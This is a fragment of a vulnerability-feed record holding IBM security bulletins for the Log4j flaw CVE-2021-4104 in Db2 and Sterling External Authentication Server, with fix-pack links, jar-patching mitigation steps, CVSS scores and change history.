64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-aix64-universal_fixpack-10.5.0.11-FP011%3A316242174097101888&includeSupersedes=0> \"AIX 64-bit\" ) \n[HP-UX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-hpipf64-universal_fixpack-10.5.0.11-FP011%3A242482463941196672&includeSupersedes=0> \"HP-UX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41021_DSClients-linuxia32-client-10.5.0.11-FP011%3A438028792052427520&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxx64-universal_fixpack-10.5.0.11-FP011%3A577009839975281408&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 big endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxppc64-universal_fixpack-10.5.0.11-FP011%3A471210663573115712&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 big endian\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxppc64le-universal_fixpack-10.5.0.11-FP011%3A775057095159355904&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linux390x64-universal_fixpack-10.5.0.11-FP011%3A600976767882452608&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Solaris 64-bit, SPARC](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-sun64-universal_fixpack-10.5.0.11-FP011%3A994737637526172160&includeSupersedes=0> \"Solaris 64-bit, SPARC\" ) \n[Solaris 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-sunamd64-universal_fixpack-10.5.0.11-FP011%3A161651527260272768&includeSupersedes=0> \"Solaris 64-bit, x86-64\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41021_DSClients-nt32-client-10.5.1100.2866-FP011%3A170657316208346784&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-ntx64-universal_fixpack-10.5.1100.2866-FP011%3A230362976060813344&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n[Inspur](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-inspurkux64-universal_fixpack-10.5.0.11-FP011%3A512422001972300608&includeSupersedes=0> \"Inspur\" ) \n \nV11.1| TBD| [IT39387](<https://www.ibm.com/support/pages/apar/IT39387> \"IT39387\" )| Special Build for V11.1.4 FP6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-aix64-universal_fixpack-11.1.4.6-FP006%3A259848826141273472&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41025_DSClients-linuxia32-client-11.1.4.6-FP006%3A800049365576409728&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linuxx64-universal_fixpack-11.1.4.6-FP006%3A973220600195816448&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linuxppc64le-universal_fixpack-11.1.4.6-FP006%3A840967649574282368&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linux390x64-universal_fixpack-11.1.4.6-FP006%3A914289956995017856&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Solaris 64-bit, SPARC](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-sun64-universal_fixpack-11.1.4.6-FP006%3A248714336279646784&includeSupersedes=0> \"Solaris 64-bit, SPARC\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41025_DSClients-nt32-client-11.1.4060.1324-FP006%3A435396118409714368&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-ntx64-universal_fixpack-11.1.4060.1324-FP006%3A887641715424039424&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| TBD| [IT39389](<https://www.ibm.com/support/pages/apar/IT39389> \"IT39389\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134764_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A759307440669784704&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134766_DSClients-linuxia32-client-11.5.6.0-FP000%3A655540181122919168&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134765_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A321475938953624576&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134763_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A676852752763543680&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134767_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A646964920519258496&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134762_DSClients-nt32-client-11.5.6000.1809-FP000%3A830387863039344000&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134761_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A220578880243028736&includeSupersedes=0> \"Windows 64-bit, x86\" )\n\nNote: The 11.5.6 special builds here are the same ones supplied for resolving CVE-2021-44228 \n \nV11.5| TBD| [IT39389](<https://www.ibm.com/support/pages/apar/IT39389> \"IT39389\" )| Special Build for V11.5.7: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134833_DB2-aix64-universal_fixpack-11.5.7.0-FP000%3A479485515202753152&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13323_134832_DSClients-linuxia32-client-11.5.7.0-FP000%3A596706133826041984&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134831_DB2-linuxx64-universal_fixpack-11.5.7.0-FP000%3A137760201590747536&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134835_DB2-linuxppc64le-universal_fixpack-11.5.7.0-FP000%3A909787610102068096&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134834_DB2-linux390x64-universal_fixpack-11.5.7.0-FP000%3A651865390747364992&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13323_134829_DSClients-nt32-client-11.5.7000.1973-FP000%3A855115844514252672&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134830_DB2-ntx64-universal_fixpack-11.5.7000.1973-FP000%3A352392631134626240&includeSupersedes=0> \"Windows 64-bit, x86\" )\n\nNote: The 11.5.7 special builds here are the same ones supplied for resolving CVE-2021-44228 \n \nIf you are using Db2 Text Search with rich text filters, after these special builds are applied, you will be required to upgrade your version of rich text filters in addition to Db2 Text search. Appropriate rich text filters (in this case version 8.5.5) for each Db2 release can be downloaded from the Db2 accessories suite page.\n\nFor details, see [here](<https://www.ibm.com/support/pages/node/6527760> \"here\" ).\n\nFor Install (Installation Manager)\n\nWe recommend that you download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\nIt was determined through further investigation that while Installation Manager was found to not be impacted by CVE-2021-4104, as the Installation Manager does not use log4j in a manner that exposes the vulnerability, it does include the older version of the library. \n\nFor v11.1.x, install the Db2 fix listed in the table above for Linux 32-bit, Linux 63-bit, Windows 32-bit and/or Windows 64-bit. This fix replaces the existing log4j jar file with an empty jar file. While the vulnerability is mitigated with this fix, a scan will still show the existence of the jar file. Alternatively you may download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\nFor earlier versions, we recommend that you download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\n## Workarounds and Mitigations\n\nFor ECM (Text Search): \n\n\nThe vulnerable jar can be patched to mitigate the vulnerability. \nNote: Do not issue START/STOP Db2 text search server if Db2 text search is not configured.\n\nOn Linux and Unix:\n\nStop the TextSearch server: \"db2ts stop for text\".\n\nRemove the JMSAppender.class file via two options: \nHere is the command:\n \n \n zip -d log4j-1.2.17.jar org/apache/log4j/net/JMSAppender.class\n \n\nIf you do not have access to 'zip', you can also use the 'jar' command.\n \n \n #assume log4j-1.2.17.jar exists in current directory\n mkdir tmp\n cd tmp\n jar xvf ../log4j-1.2.17.jar\n rm org/apache/log4j/net/JMSAppender.class\n jar cvf ../log4j-1.2.17-patched.jar .\n cd .. \n rm log4j-1.2.17.jar \n ln -s log4j-1.2.17-patched.jar log4j-1.2.17.jar\n rm -rf tmp \n \n\nStart the TextSearch server: \"db2ts start for text\".\n\nOn Windows the Java jar tool with CMD can be used to follow the similar Unix instructions when using jar.\n \n \n Stop the TextSearch server: \"db2ts stop for text\" in the Db2 command line.\n Start the Windows CMD program and go to the SQLLIB\\db2tss\\lib directory which is found in the installation path e.g. \"cd C:\\ProgramFiles\\IBM\\SQLLIB\\db2tss\\lib\"\n Make a copy of the log4j-1.2.17.jar file e.g. \"cp log4j-1.2.17.jar log4j-1.2.17.jar.bak\"\n Make a new directory e.g. \"mkdir tmp\"\n Change to the new directory e.g. \"cd tmp\"\n Extract the jar file using the jar program found in the JDK that is in the SQLLIB\\java path e.g. \"..\\..\\..\\java\\jdk\\bin\\jar xvf ..\\log4j-1.2.17.jar\"\n Delete the JMSAppender.class file e.g. \"del org\\apache\\log4j\\net\\JMSAppender.class\"\n Package the files back into the jar e.g. \"..\\..\\..\\java\\jdk\\bin\\jar xvf ..\\log4j-1.2.17-patched.jar .\"\n Replace the log4j-1.2.17.jar with log4j-1.2.17-patched.jar. e.g. \"cd ..\", \"del log4j-1.2.17.jar\", \"ren log4j-1.2.17-patched.jar log4j-1.2.17.jar\".\n Cleanup the \"tmp\" folder.\n Start the TextSearch server: \"db2ts start for text\" in the Db2 command line. \n \n \n \n \n \n\nFor version 11.1 on linux and unix platforms only (not on Windows), the log4j-1.2.17.jar file under \"/opt/IBM/db2/V11.1/federation/restservice/hadoop\" in the Db2 installation location may be safely removed. \n \n\n\nSubsequent installation of fixpacks may result in the error:\n\nERROR: Some error occurred while moving files during backup or restore to directory, \"/opt/IBM/db2/<version>/.backup\". The return code is \"4394967295\".\n\nTo resolve this apply the fixpack with the -f nobackup flag.\n\nThis file does not exist on Db2 versions prior to 11.1\n\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6549888> \"Security Bulletin: \u00a0A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0\\(CVE-2021-44832\\)\" )\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6528672> \"Security Bulletin: \u00a0Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \\(CVE-2021-45046, CVE-2021-45105\\)\" )\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526462> \"Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \\(CVE-2021-44228\\)\" )\n\n## Acknowledgement\n\n## Change History\n\n06 June 2022: Added mitigation to remove log4j from hadoop wrapper on linux/unix and links to other related Log4j bulletins \n31 Jan 2022: Added 10.5 links for Windows 64-bit and Windows 32-bit fix packs. \n31 Dec 2021: Added 10.5 links for AIX 64-bit, Linux 32-bit and Linux 64-bit fix packs. \n29 Dec 2021: Added 11.1.4.6 links for Windows 32-bit and Solaris 64-bit fix packs \n28 Dec 2021: Updated ECM Text Search section to reflect that: text search server should not be stopped or started if the customer is not using text search, and added the instructions to copy the patched jar in place of the original.24 Dec 2021: Removed Install section as impacted as further investigation determined that Installation Manager was not affected by this vulnerability, thus Db2 is not vulnerable from that dependency. Added 11.1.4.6 link for Windows 64-bit fix pack \n22 Dec 2021: Added 10.5 link for Inspur. Clarified server and client impact for each issue \n21 Dec 2021: Added 11.5.6 links for Windows 32-bit and Windows 64-bit fix packs. Added 11.5.7 links for Windows 32-bit and Windows 64-bit fix packs \n21 Dec 2021: Updated note that the 11.5.6 builds are the same as the one for CVE-2021-44228. Updated description of Db2 Text Search update. \n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"10.1, 10.5, 11.1, 11.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-07T14:36:22", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-06-07T14:36:22", "id": "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "href": "https://www.ibm.com/support/pages/node/6528678", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:10:37", "description": "## Summary\n\nIBM Sterling External Authentication Server is vulnerable to an arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix upgrades all Apache Log4j 1.x to Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling External Authentication Server| 6.0.3 \nIBM Sterling External Authentication Server| 6.0.2 \nIBM Sterling External Authentication Server| 2.4.3.2 \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| iFix| Remediation \n---|---|---|--- \nIBM Sterling External Authentication Server| 6.0.3| iFix 01 Plus Build 141| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus Build 214| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling External Authentication Server| 2.4.3.2| iFix 13 Plus Build 296| [Fix Central - 2432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=2.4.3.2&platform=All&function=all> \"Fix Central - 2432\" ) \nThis fix also remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"Sterling External Authentication Server\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.0.3, 6.0.2, 2.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T19:03:49", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Secure External Authentication Server (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T19:03:49", "id": "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "href": "https://www.ibm.com/support/pages/node/6538954", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:09:52", "description": "## Summary\n\nWebSphere Application Server (WAS) is shipped as a component of IBM Security Guardium Key Lifecycle Manager (GKLM). Information about the 